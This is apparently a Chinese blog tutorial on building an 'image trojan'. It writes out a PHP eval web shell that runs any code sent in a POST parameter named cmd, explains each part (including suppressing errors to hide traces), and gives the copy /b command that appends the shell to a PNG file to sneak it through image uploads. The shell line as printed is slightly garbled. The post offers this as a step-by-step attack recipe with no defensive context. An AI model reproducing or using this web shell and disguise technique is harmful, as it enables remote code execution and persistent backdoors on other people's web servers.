图片马合成保姆级教程

相信爱看博主文章的各位彦祖和亦非们都看过博主在文章中提到图片马

那到底什么是图片马呢?

简单来说就是图片与木马合成的二进制文件

怎么合成呢?

这里博主就直接进入正题了

首先我们要新建一个文件夹

然后把图片和木马都放进去这个文件夹里面

这里博主的木马是这样写的

<?php @eval($_POST'cmd');?>

这个的意思是

  • <?php ... ?>:PHP代码标记,表示中间内容是PHP脚本。

  • @:错误抑制符,让即使后续函数出错也不显示报错,目的是隐藏攻击痕迹。

  • eval($_POST['cmd']):

    • $_POST['cmd']:接收HTTP POST请求中参数名为cmd的值。

    • eval():把传入的字符串当作PHP代码执行

图片的内容则是保持原有的不变

最后启动cmd,执行下述命令

copy /b C:\Users\11548\Desktop\新建文件夹\1.png + C:\Users\11548\Desktop\新建文件夹\2.php C:\Users\11548\Desktop\新建文件夹\3.png

这里的意思就是复制,用二进制的形式,这里博主使用的是绝对路径

第一个是图片的绝对路径

第二个是木马的绝对路径

第三个是生成图片马的绝对路径

中间的+号,前后都有空格

这里的图片马就是把图片和木马的代码合并放一起了

到这里我们就会生成图片马在文件夹中

文章到此结束

有不懂的欢迎评论区留言

博主看到会及时回复

感谢您宝贵的时间

相关推荐
梦帮科技10 小时前
【3.0修订版】跨链中继与事件编排:Relayer 监听、多签验证与故障自愈
web安全·金融·区块链·密码学·智能合约·安全架构·信任链
黄金龙PLUS11 小时前
如何基于置换算法来设计对称加密算法
算法·网络安全·密码学·哈希算法·同态加密
王大傻092813 小时前
堆叠注入(Stacked Queries Injection)详解:原理、利用与防御
服务器·网络·数据库·web安全·网络安全
超级架构师16 小时前
迈向数字文明的秩序基石:全面解析 AICTRI 开源 AI 智能体身份与访问管理规范(AgentIAM)
人工智能·开源·ai编程·安全架构
芯盾时代18 小时前
从《人工智能安全治理框架3.0》看智能体安全治理
人工智能·安全·网络安全·智能体
三84419 小时前
sql注入
web安全·sql注入
ggb喔20 小时前
52pojie 的桌面工具:为什么它们总在高分屏上模糊、资源管理器重启后失效
windows·python·网络安全·软件工程·个人开发·用户界面·用户体验
小杉泽1 天前
【长三角WP】长三角网络安全攻防大赛初赛WP(Misc&Crypto&数据安全)
安全·网络安全
微软技术分享1 天前
面向二进制安全的大模型多智能体框架
网络·安全·web安全
学逆向的2 天前
win32远程线程
网络安全·api·win32